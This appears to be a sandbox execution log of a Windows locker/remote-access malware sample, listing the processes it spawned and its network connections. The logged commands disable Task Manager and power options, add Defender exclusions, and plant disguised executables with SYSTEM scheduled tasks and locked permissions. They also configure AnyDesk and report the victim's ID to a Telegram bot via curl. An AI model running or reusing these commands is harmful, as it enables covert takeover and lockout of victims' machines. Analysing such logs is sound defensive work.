"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5208 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4704 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5772 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4976 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5652 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5624 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6160 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6448 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://spankbang.com/tv/?station=hypno+joi
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=4972 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6644 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5844 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5784 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Roaming\locked.exe
"C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5860 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-service
\??\c:\users\Admin\downloads\AnyDesk.exe
"c:\users\Admin\downloads\AnyDesk.exe" --local-control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4088 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4E36.tmp\4E37.tmp\4E38.bat C:\Users\Admin\AppData\Roaming\locked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6920 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6968 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=7152 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=2384 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=7584 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=7340 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5228 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4b8 0x510
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk
C:\Windows\system32\timeout.exe
timeout /t 5 /nobreak
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --service
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\757ff3472ee54e2bb9be4f5d45b0175b /t 2404 /p 1824
C:\ProgramData\AnyDesk.exe
"C:\ProgramData\AnyDesk.exe" --control
C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe
C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/stn.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/svchost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=8056 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F
C:\Windows\system32\schtasks.exe
schtasks /run /tn "MicrosoftEdgeUpdateTaskList"
C:\ProgramData\Anydesk.exe
C:\ProgramData/Anydesk.exe
C:\Windows\system32\schtasks.exe
schtasks /run /tn "SystemTaskNavigator"
C:\ProgramData\stn.exe
C:\ProgramData/stn.exe
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9BF3.tmp\9BF4.tmp\9BF5.bat C:\ProgramData\stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Everyone:RX /deny Everyone:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=5524 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAE8GzCCh9rcF27KXAFXed5iYXzI_Yx3DNw/sendMessage?chat_id=-1002158648396&text=Admin-1369714872"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=6280 --field-trial-handle=2728,i,17916947856825341162,15087041324492240293,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | t.co | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 13.87.96.169:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 104.90.25.175:443 | www.microsoft.com | tcp |
| SE | 184.31.15.35:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 52.202.249.212:80 | rb.gy | tcp |
| US | 52.202.249.212:80 | rb.gy | tcp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | rb.gy | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.6.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.25.90.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 52.202.249.212:443 | rb.gy | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 8.8.8.8:53 | 212.249.202.52.in-addr.arpa | udp |
| US | 172.67.160.19:443 | iplogger.cn | udp |
| US | 172.67.160.19:443 | iplogger.cn | tcp |
| US | 8.8.8.8:53 | 19.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 104.208.16.94:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 94.16.208.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| NL | 142.250.102.92:443 | pay.google.com | tcp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| RU | 88.212.202.52:443 | counter.yadro.ru | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| FR | 51.38.43.18:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | 92.102.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.202.212.88.in-addr.arpa | udp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| US | 8.8.8.8:53 | iplogger.cn | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.102.92:443 | pay.google.com | tcp |
| NL | 142.250.102.92:443 | pay.google.com | tcp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 18.43.38.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | 33.66.178.51.in-addr.arpa | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| DE | 148.251.1.246:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| DE | 78.46.174.169:443 | static.a-ads.com | tcp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.174.46.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
| US | 8.8.8.8:53 | store4.gofile.io | udp |
